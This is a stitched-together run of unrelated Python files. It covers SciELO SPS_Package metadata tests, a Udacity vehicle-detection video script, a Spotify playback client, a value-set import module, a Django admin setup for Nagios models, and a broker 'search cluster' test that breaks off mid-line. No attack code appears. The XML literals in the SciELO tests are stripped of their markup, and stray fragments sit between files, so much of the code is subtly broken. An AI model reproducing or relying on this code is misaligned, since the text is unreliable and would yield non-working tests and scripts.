""" def _get_sps_package(self, fpage=None, other=None, pid_v2=None): items = ( fpage and "{}".format(fpage), other and '{}'.format( other), pid_v2 and '{}'.format( pid_v2), ) article_meta_xml = "".join((item for item in items if item)) xml = self.article_xml.format(article_meta_xml) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_order_returns_none_because_none_is_set(self): _sps_package = self._get_sps_package() self.assertIsNone(_sps_package.order) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_fpage_has_more_than_five_digits(self): _sps_package = self._get_sps_package(fpage="123456") self.assertIsNone(_sps_package.order) self.assertEqual("123456", _sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_fpage_is_alpha(self): _sps_package = self._get_sps_package(fpage="a") self.assertIsNone(_sps_package.order) self.assertEqual("a", _sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_fpage_is_alphanum(self): _sps_package = self._get_sps_package(fpage="a1") self.assertIsNone(_sps_package.order) self.assertEqual("a1", _sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_other_has_more_than_five_digits(self): _sps_package = self._get_sps_package(other="123456") self.assertIsNone(_sps_package.order) self.assertEqual("123456", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_other_is_alpha(self): _sps_package = self._get_sps_package(other="a") self.assertIsNone(_sps_package.order) self.assertEqual("a", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_other_is_alphanum(self): _sps_package = self._get_sps_package(other="a1") self.assertIsNone(_sps_package.order) self.assertEqual("a1", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_none_because_pid_v2_length_is_not_23(self): _sps_package = self._get_sps_package(pid_v2="1234512345123451234512345") self.assertIsNone(_sps_package.order) self.assertEqual("1234512345123451234512345", _sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_none_because_pid_v2_last_five_digits_is_alpha(self): _sps_package = self._get_sps_package(pid_v2="123451234512345123ABCDE") self.assertIsNone(_sps_package.order) self.assertEqual("123451234512345123ABCDE", _sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_none_because_pid_v2_last_five_digits_is_alphanum(self): _sps_package = self._get_sps_package(pid_v2="1234512345123451234512A") self.assertIsNone(_sps_package.order) self.assertEqual("1234512345123451234512A", _sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) 
self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_pid_v2_last_five_digits(self): _sps_package = self._get_sps_package(pid_v2="12345123451234512345123") self.assertEqual("45123", _sps_package.order) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_fpage(self): _sps_package = self._get_sps_package(fpage="123") self.assertEqual("00123", _sps_package.order) self.assertIsNone(_sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_other(self): _sps_package = self._get_sps_package(other="623") self.assertEqual("00623", _sps_package.order) self.assertIsNone(_sps_package.scielo_pid_v2) self.assertIsNone(_sps_package.fpage) self.assertEqual("623", _sps_package.article_id_which_id_type_is_other) def test_order_returns_pid_v2_last_five_digits(self): _sps_package = self._get_sps_package(pid_v2="12345123451234512345123") self.assertEqual("45123", _sps_package.order) self.assertIsNone(_sps_package.fpage) self.assertIsNone(_sps_package.article_id_which_id_type_is_other) def test_order_returns_pid_v2_last_five_digits_by_order_of_precedence(self): # pid_v2 > other > fpage _sps_package = self._get_sps_package( pid_v2="12345123451234512345123", fpage="123", other="543") self.assertEqual("45123", _sps_package.order) self.assertEqual("123", _sps_package.fpage) self.assertEqual("543", _sps_package.article_id_which_id_type_is_other) self.assertEqual("12345123451234512345123", _sps_package.scielo_pid_v2) def test_order_returns_other_by_order_of_precedence(self): # pid_v2 > other > fpage _sps_package = self._get_sps_package(fpage="123", other="543") self.assertEqual("00543", _sps_package.order) self.assertEqual("123", _sps_package.fpage) self.assertEqual("543", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) def test_order_returns_fpage_by_order_of_precedence(self): # pid_v2 > other > fpage _sps_package = self._get_sps_package(fpage="123", other="543A") self.assertEqual("00123", _sps_package.order) self.assertEqual("123", _sps_package.fpage) self.assertEqual("543A", _sps_package.article_id_which_id_type_is_other) self.assertIsNone(_sps_package.scielo_pid_v2) class Test_SPS_Package_SetAttrIfRequired_Sets_DATA(unittest.TestCase): def setUp(self): article_xml = """
""" xmltree = etree.fromstring(article_xml) self._sps_package = SPS_Package(xmltree, "nome-do-arquivo") def test_fix_sets_scielo_pid_v2(self): self._sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000512345', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_sets_aop_pid(self): self._sps_package.fix( "aop_pid", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000512345', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_sets_article_id_which_id_type_is_other(self): self._sps_package.fix( "article_id_which_id_type_is_other", "12") self.assertIn( '00012', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_sets_original_language(self): self._sps_package.fix( "original_language", "es") self.assertIn( '
',
            str(etree.tostring(self._sps_package.xmltree))
        )


class Test_SPS_Package_SetAttrIfRequired_Keeps_Original_DATA(unittest.TestCase):
    article_xml = """
S0000-00002019000598765 S0000-00002019000598765 98765
""" def _get_sps_package(self, article_meta_xml): xml = self.article_xml.format(article_meta_xml) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_fix_keeps_original_value_of_original_scielo_pid_v2(self): article_meta_xml = ( '' 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_keeps_original_value_of_original_aop_pid(self): article_meta_xml = ( 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix("aop_pid", "S1518-87872019053000621") self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_keeps_original_value_of_original_article_id_which_id_type_is_other(self): article_meta_xml = """ 98765 """ _sps_package = self._get_sps_package(article_meta_xml) with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix("article_id_which_id_type_is_other", "621") self.assertIn( '98765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_keeps_original_value_of_original_lang(self): _sps_package = self._get_sps_package("") with self.assertRaises(NotAllowedtoChangeAttributeValueError): _sps_package.fix("original_language", "pt") self.assertIn( '
',
            str(etree.tostring(_sps_package.xmltree))
        )


class Test_SPS_Package_SetAttrIfRequired_Update_DATA(unittest.TestCase):
    def setUp(self):
        article_xml = """
incorrect incorrect incorrect
""" xmltree = etree.fromstring(article_xml) self._sps_package = SPS_Package(xmltree, "nome-do-arquivo") def test_fix_replaces_value_of_scielo_pid_v2(self): self._sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345") self.assertIn( 'S0000-00002019000512345', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_replaces_value_of_aop_pid(self): self._sps_package.fix( "aop_pid", "S1518-87872019053000621") self.assertIn( 'S1518-87872019053000621', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_replaces_value_of_article_id_which_id_type_is_other(self): self._sps_package.fix( "article_id_which_id_type_is_other", "621") self.assertIn( '00621', str(etree.tostring(self._sps_package.xmltree)) ) def test_fix_replaces_value_of_original_lang(self): self._sps_package.fix("original_language", "pt") self.assertIn( '
',
            str(etree.tostring(self._sps_package.xmltree))
        )


class Test_is_valid_value_for_order(unittest.TestCase):
    def test_raises_exception_because_value_is_none(self):
        with self.assertRaises(InvalidValueForOrderError):
            is_valid_value_for_order(None)

    def test_raises_exception_because_value_is_str(self):
        with self.assertRaises(InvalidValueForOrderError):
            is_valid_value_for_order("x")

    def test_raises_exception_because_value_is_zero(self):
        with self.assertRaises(InvalidValueForOrderError):
            is_valid_value_for_order("0")

    def test_raises_exception_because_value_is_outofrange(self):
        with self.assertRaises(InvalidValueForOrderError):
            is_valid_value_for_order("999999")

    def test_returns_true(self):
        result = is_valid_value_for_order("6")
        self.assertTrue(result)


class Test_is_allowed_to_update(unittest.TestCase):
    def _get_sps_package(self, other, fpage):
        tag_other = ""
        if other:
            tag_other = f'{other}'
        tag_fpage = ""
        if fpage:
            tag_fpage = f'{fpage}'
        article_xml = f"""
incorrect incorrect {tag_other} {tag_fpage}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_true(self): sps_package = self._get_sps_package(other=None, fpage="vii") attr_name = "any_attribute" result = sps_package._is_allowed_to_update(attr_name, "1234") self.assertTrue(result) class TestIsAllowedToUpdate_article_id_which_id_type_is_other(unittest.TestCase): def _get_sps_package(self, other, fpage): tag_other = "" if other: tag_other = f'{other}' tag_fpage = "" if fpage: tag_fpage = f'{fpage}' article_xml = f"""
incorrect incorrect {tag_other} {tag_fpage}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_false(self): sps_package = self._get_sps_package(other="1234", fpage="vii") result = sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "1234") self.assertFalse(result) def test_returns_true(self): sps_package = self._get_sps_package(other=None, fpage="vii") result = sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "1234") self.assertTrue(result) def test_returns_raise_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package(other="1234", fpage="vii") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "222") expected = ( "Not allowed to update article_id_which_id_type_is_other " "(1234) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_returns_raise_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(other=None, fpage="vii") with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "vIII") expected = ( "Not allowed to update article_id_which_id_type_is_other " "(None) with vIII, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class TestIsAllowedToUpdate_scielo_pid_v2(unittest.TestCase): def _get_sps_package(self, pid_v2): tag_pid_v2 = "" if pid_v2: tag_pid_v2 = f'{pid_v2}' article_xml = f"""
incorrect {tag_pid_v2}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_false(self): sps_package = self._get_sps_package("S0000-00002019000512345") result = sps_package._is_allowed_to_update( "scielo_pid_v2", "S0000-00002019000512345") self.assertFalse(result) def test_returns_true(self): sps_package = self._get_sps_package(None) result = sps_package._is_allowed_to_update( "scielo_pid_v2", "S0000-00002019000512345") self.assertTrue(result) def test_returns_raise_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package("S0000-00002019000512345") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package._is_allowed_to_update("scielo_pid_v2", "222") expected = ( "Not allowed to update scielo_pid_v2 " "(S0000-00002019000512345) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_returns_raise_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(None) with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update("scielo_pid_v2", "vIII") expected = ( "Not allowed to update scielo_pid_v2 " "(None) with vIII, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class TestIsAllowedToUpdate_original_language(unittest.TestCase): def _get_sps_package(self, lang): article_xml = f"""
incorrect
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_returns_false(self): sps_package = self._get_sps_package("pt") result = sps_package._is_allowed_to_update( "original_language", "pt") self.assertFalse(result) def test_returns_true(self): sps_package = self._get_sps_package(None) result = sps_package._is_allowed_to_update( "original_language", "pt") self.assertTrue(result) def test_returns_raise_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package("pt") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package._is_allowed_to_update("original_language", "222") expected = ( "Not allowed to update original_language " "(pt) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_returns_raise_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(None) with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update("original_language", "espanhol") expected = ( "Not allowed to update original_language " "(None) with espanhol, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class Test_SPS_article_id_which_id_type_is_other(unittest.TestCase): def _get_sps_package(self, other, fpage): tag_other = "" if other: tag_other = f'{other}' tag_fpage = "" if fpage: tag_fpage = f'{fpage}' article_xml = f"""
incorrect incorrect {tag_other} {tag_fpage}
""" xmltree = etree.fromstring(article_xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_keeps_same_value(self): sps_package = self._get_sps_package(other="1234", fpage="vii") sps_package.article_id_which_id_type_is_other = "1234" self.assertEqual(sps_package.article_id_which_id_type_is_other, "1234") def test_update_with_new_value(self): sps_package = self._get_sps_package(other=None, fpage="vii") sps_package.article_id_which_id_type_is_other = "1234" self.assertEqual( sps_package.article_id_which_id_type_is_other, "01234") def test_raises_exception_because_attr_has_already_a_valid_value(self): sps_package = self._get_sps_package(other="1234", fpage="vii") with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: sps_package.article_id_which_id_type_is_other = "222" expected = ( "Not allowed to update article_id_which_id_type_is_other " "(1234) with 222, " "because current is valid" ) self.assertEqual(expected, str(exc.exception)) def test_raises_exception_because_new_value_is_invalid(self): sps_package = self._get_sps_package(other=None, fpage="vii") with self.assertRaises(InvalidAttributeValueError) as exc: sps_package._is_allowed_to_update( "article_id_which_id_type_is_other", "vIII") expected = ( "Not allowed to update article_id_which_id_type_is_other " "(None) with vIII, " "because new value is invalid" ) self.assertEqual(expected, str(exc.exception)) class Test_SPS_Package_Fix_Silently(unittest.TestCase): article_xml = """
S0000-00002019000598765 S0000-00002019000598765 98765
""" def _get_sps_package(self, article_meta_xml): xml = self.article_xml.format(article_meta_xml) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "nome-do-arquivo") def test_fix_raises_no_exception_and_does_not_update_scielo_pid_v2(self): article_meta_xml = ( '' 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) _sps_package.fix( "scielo_pid_v2", "S0000-00002019000512345", silently=True) self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_raises_no_exception_and_does_not_update_aop_pid(self): article_meta_xml = ( 'S0000-00002019000598765' ) _sps_package = self._get_sps_package(article_meta_xml) _sps_package.fix("aop_pid", "S1518-87872019053000621", silently=True) self.assertIn( 'S0000-00002019000598765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_raises_no_exception_and_does_not_update_article_id_which_id_type_is_other(self): article_meta_xml = """ 98765 """ _sps_package = self._get_sps_package(article_meta_xml) _sps_package.fix("article_id_which_id_type_is_other", "621", silently=True) self.assertIn( '98765', str(etree.tostring(_sps_package.xmltree)) ) def test_fix_raises_no_exception_and_does_not_update_lang(self): _sps_package = self._get_sps_package("") _sps_package.fix("original_language", "pt", silently=True) self.assertIn( '
', str(etree.tostring(_sps_package.xmltree)) ) class TestSourceJson(unittest.TestCase): @property def _json_content(self): return """{ "article": { "v32": [ { "_": "2A" } ], "v31": [ { "_": "60" } ] }, "fulltexts": { "html": { "en": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0004-282X2002000200003&tlng=en" }, "pdf": { "en": "http://www.scielo.br/pdf/anp/v60n2a/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2a/es_a03v60n2.pdf" } } }""" def test_issue_folder_returns(self): source = SourceJson(self._json_content) self.assertEqual("v60n2A", source.issue_folder) def test_renditions_metadata_returns(self): source = SourceJson(self._json_content) expected = { "en": "http://www.scielo.br/pdf/anp/v60n2a/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2a/es_a03v60n2.pdf" } self.assertEqual(expected, source.renditions_metadata) def test_fixed_renditions_metadata_returns(self): source = SourceJson(self._json_content) expected = { "en": "http://www.scielo.br/pdf/anp/v60n2A/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2A/es_a03v60n2.pdf" } self.assertEqual(expected, source.fixed_renditions_metadata) def test_get_renditions_metadata_returns(self): source = SourceJson(self._json_content) metadata = { "en": "http://www.scielo.br/pdf/anp/v60n2A/a03v60n2.pdf", "es": "http://www.scielo.br/pdf/anp/v60n2A/es_a03v60n2.pdf" } renditions = [ ("http://www.scielo.br/pdf/anp/v60n2A/a03v60n2.pdf", "a03v60n2"), ("http://www.scielo.br/pdf/anp/v60n2A/es_a03v60n2.pdf", "es_a03v60n2"), ] expected = (renditions, metadata) self.assertEqual(expected, source.get_renditions_metadata()) class TestIsValidValueForIssns(unittest.TestCase): def test_is_valid_value_for_issns_raises_is_exception_because_value_is_empty_dict(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({}) self.assertIn("'epub' and/or 'ppub'", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_value_is_not_dict(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns(('a', 'b')) self.assertIn("Expected dict", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_of_duplicated_values(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({"epub": 'x', "ppub": "x"}) self.assertIn("duplicated values", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_of_invalid_key(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({"invalid_key": 'y', "ppub": "x"}) self.assertIn("Expected dict which keys are 'epub' and/or 'ppub'.", str(exc.exception)) def test_is_valid_value_for_issns_raises_is_exception_because_of_invalid_values(self): with self.assertRaises(ValueError) as exc: is_valid_value_for_issns({"ppub": 'y', "epub": "x"}) self.assertIn("is not an ISSN", str(exc.exception)) class TestSPSPackageHasNoIssns(unittest.TestCase): def setUp(self): xml = f"""
""" xmltree = etree.fromstring(xml) self._sps_package = SPS_Package(xmltree, None) def test_get_issns_returns_none_because_there_is_no_issn(self): self.assertIsNone(self._sps_package.issns) def test_set_issns_updates_issns(self): expected = { "epub": "1209-8709", "ppub": "8809-8709", } self._sps_package.issns = { "epub": "1209-8709", "ppub": "8809-8709", } self.assertEqual(expected, self._sps_package.issns) xml = etree.tostring(self._sps_package.xmltree) self.assertIn(b'1209-8709', xml) self.assertIn(b'8809-8709', xml) def test_set_issns_raises_exception_if_new_value_is_invalid(self): expected = None with self.assertRaises(InvalidAttributeValueError) as exc: self._sps_package.issns = { "epub": "XXXX-YYY", "ppub": "8888-879", } self.assertEqual(expected, self._sps_package.issns) xml = etree.tostring(self._sps_package.xmltree) self.assertNotIn(b'XXXX-YYY', xml) self.assertNotIn(b'8888-879', xml) def test_fix_does_not_raise_exception_because_is_silenced(self): self._sps_package.fix('issns', 'invalid value', silently=True) self.assertIsNone(self._sps_package.issns) def test_fix_raises_exception_because_is_not_silenced(self): new_value = 'invalid value' with self.assertRaises(InvalidAttributeValueError) as exc: self._sps_package.fix('issns', new_value, silently=False) class TestSPSPackageHasIssns(unittest.TestCase): def setUp(self): xml = f"""
1234-0987 1834-0987
""" xmltree = etree.fromstring(xml) self._sps_package = SPS_Package(xmltree, None) def test_get_issns_returns_dict(self): expected = { "epub": "1234-0987", "ppub": "1834-0987", } self.assertEqual(expected, self._sps_package.issns) def test_set_issns_raises_exception_and_does_not_allowed_update_issns(self): expected = { "epub": "1234-0987", "ppub": "1834-0987", } with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: self._sps_package.issns = { "epub": "XXXX-YYYY", "ppub": "8888-8709", } self.assertIn("Not allowed to set ISSNs", str(exc.exception)) self.assertEqual(expected, self._sps_package.issns) xml = etree.tostring(self._sps_package.xmltree) self.assertIn(b'1234-0987', xml) self.assertIn(b'1834-0987', xml) def test_fix_does_not_raise_exception_because_is_silenced(self): new_value = { "epub": "1299-0987", "ppub": "1899-0987", } self._sps_package.fix('issns', new_value, silently=True) self.assertNotEqual(new_value, self._sps_package.issns) def test_fix_raises_exception_because_is_not_silenced(self): new_value = { "epub": "1299-0987", "ppub": "1899-0987", } with self.assertRaises(NotAllowedtoChangeAttributeValueError) as exc: self._sps_package.fix('issns', new_value, silently=False) Alyxion/Udacity_SelfDrivingCarEngineerNd ##################################################################################################################### # # # This file is part of the 5th project of Udacity's Self-Driving Car Engineer Nd - Vehicle Detection and Tracking # # # # Copyright (c) 2018 by # # # ##################################################################################################################### # With help of this file you can compile project video by just running it. # If you did not do so yet you need to call the script Train_Classifier once to calibrate the camera and retrain # the classifier. 
# Add reference to files from previous project import sys import os rel_path = os.path.join(os.path.dirname(__file__), '..', '1_16_Project_4_Advanced_Lane_Lines') sys.path.append(rel_path) import cv2 import numpy as np from moviepy.editor import VideoFileClip import Vehicle_Video_Creator import AdvLaneCamera import AdvLaneVideoCreator import Vehicle_Trainer import Hog_Me import Object_Finder import Object_Classifier import Heater # Load camera calibration camera = AdvLaneCamera.AdvCamera() camera.load_from_pickle() # Load vehicle detection neural network trainer = Vehicle_Trainer.Vehicle_Trainer() do_train = False if do_train: print("Retraining classifier") trainer.classifier.use_svm = False trainer.train_vehicles('./../data/1_20_Object_Detection/classify/**/*.png', visualize=False) trainer.save_to_disk() else: trainer.load_from_disk() # Create video video_creator = Vehicle_Video_Creator.Vehicle_Video_Creator(trainer=trainer, camera=camera) output_video_name = 'test_videos_output/result.mp4' input_video_name = "project_video.mp4" input_clip = VideoFileClip(input_video_name) # sub_clip = input_clip.subclip(48,51) # sub_clip = input_clip.subclip(25,30) # sub_clip = input_clip.subclip(0,2) sub_clip = input_clip video_creator.add_lanes = True video_creator.process_video(sub_clip, output_video_name)0 import os import requests import spotipy import spotipy.oauth2 import spotipy.util import yaml SCOPES = ' '.join([ 'playlist-read-private', 'playlist-modify-public', 'user-read-playback-state', 'user-modify-playback-state', 'user-read-currently-playing', 'app-remote-control', ]) _BASE_URL = 'https://api.spotify.com' class Spotify: token = None _client = None _credentials = None def __init__(self): self._credentials = self._load_credentials() try: self._client = spotipy.Spotify(auth=self._credentials['auth']) self._client.me() except: self.login_user() self._client = spotipy.Spotify(auth=self._credentials['auth']) self.token = self._credentials['auth'] def login_user(self): token = spotipy.util.prompt_for_user_token(self._credentials['username'], SCOPES, client_id=self._credentials['client_id'], client_secret=self._credentials['client_secret'], redirect_uri='http://localhost:1337/callback', cache_path=os.path.expanduser(f"~/.q/spotify-cache-{self._credentials['username']}")) with open(os.path.expanduser("~/.q/spotify_credentials"), 'w') as stream: self._credentials['auth'] = token yaml.safe_dump(self._credentials, stream) def _load_credentials(self): with open(os.path.expanduser("~/.q/spotify_credentials"), 'r') as stream: return yaml.safe_load(stream) def currently_playing(self): return requests.request('GET', _BASE_URL + '/v1/me/player', headers={'Authorization': 'Bearer ' + self.token}) def next(self): requests.post(_BASE_URL + '/v1/me/player/next', headers={'Authorization': 'Bearer ' + self.token}) def prev(self): requests.post(_BASE_URL + '/v1/me/player/previous', headers={'Authorization': 'Bearer ' + self.token}) def play(self): requests.put(_BASE_URL + '/v1/me/player/play', headers={'Authorization': 'Bearer ' + self.token}) def pause(self): requests.put(_BASE_URL + '/v1/me/player/pause', headers={'Authorization': 'Bearer ' + self.token}) from .valueset import RegionAnnotation, ValueSet from .strided_interval import StridedInterval, CreateStridedInterval from .discrete_strided_interval_set import DiscreteStridedIntervalSet from .abstract_location import AbstractLocation from .bool_result import BoolResult, TrueResult, FalseResult, MaybeResult # -*- coding: utf-8 -*- # Copyright (C) <> # # 
Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE # OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Adding models to Admin site for Nagios app from django.contrib import admin from apps.nagios.models import Satellite, SecurityPort class SatelliteAdmin(admin.ModelAdmin): list_display = ( 'name', 'active', 'is_gearman', 'alias', 'fqdn', 'ip_address') list_filter = ('active',) fieldsets = ( (None, { 'fields': ('name', 'active', 'is_gearman') }), ('Network settings', { 'fields': ('ip_address', 'alias', 'fqdn') }), ('Livestatus settings', { 'classes': ('collapse',), 'fields': ('live_port', 'nagios_url') }), ) class SecurityPortAdmin(admin.ModelAdmin): list_display = ('name', 'description', 'protocol', 'begin_port', 'end_port') fieldsets = ( ('Indentity', { 'fields': ('name', 'description', 'protocol') }), ('Range', { 'fields': ('begin_port', 'end_port') }), ) admin.site.register(Satellite, SatelliteAdmin) admin.site.register(SecurityPort, SecurityPortAdmin) tests/broker/test_search_cluster_esx.py #!/usr/bin/env python # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*- # ex: set expandtab softtabstop=4 shiftwidth=4: # # Copyright (C) 2010,2011,2012,2013,2014,2015,2016,2017 Contributor # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
"""Module for testing the search cluster command (former search esx cluster queries).""" import unittest if __name__ == "__main__": import utils utils.import_depends() from brokertest import TestBrokerCommand class TestSearchClusterESX(TestBrokerCommand): def testclusteravailable(self): command = "search cluster --cluster_type esx --cluster utecl1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchclean(out, "Metacluster: utmc1", command) self.matchclean(out, "Building: ut", command) def testclusterunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--cluster', 'cluster-does-not-exist'] self.notfoundtest(command) def testmetaclusteravailabledeprecated(self): command = "search cluster --cluster_type esx --esx_metacluster utmc1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testmetaclusteravailable(self): command = "search cluster --cluster_type esx --metacluster utmc1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testmetaclusterunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--esx_metacluster', 'metacluster-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Metacluster metacluster-does-not-exist not found.", command) def testclusteravailablefull(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--cluster', 'utecl1', '--fullinfo'] out = self.commandtest(command) self.matchoutput(out, "ESX Cluster: utecl1", command) self.matchoutput(out, "Metacluster: utmc1", command) self.matchoutput(out, "Building: ut", command) def testesxhostavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--member_hostname', 'evh1.aqd-unittest.ms.com'] out = self.commandtest(command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl1", command) def testesxhostunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--member_hostname=host-does-not-exist.aqd-unittest.ms.com"] out = self.notfoundtest(command) self.matchoutput(out, "Host host-does-not-exist.aqd-unittest.ms.com " "not found", command) def testvmavailable(self): command = "search cluster --cluster_type esx --esx_virtual_machine evm1" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) def testvmunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--esx_virtual_machine', 'machine-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Machine machine-does-not-exist not found", command) def testguestavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--esx_guest', 'aqddesk1.msad.ms.com'] out = self.commandtest(command) self.matchoutput(out, "utecl1", command) def testguestunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--esx_guest=host-does-not-exist.aqd-unittest.ms.com"] out = self.notfoundtest(command) self.matchoutput(out, "Host 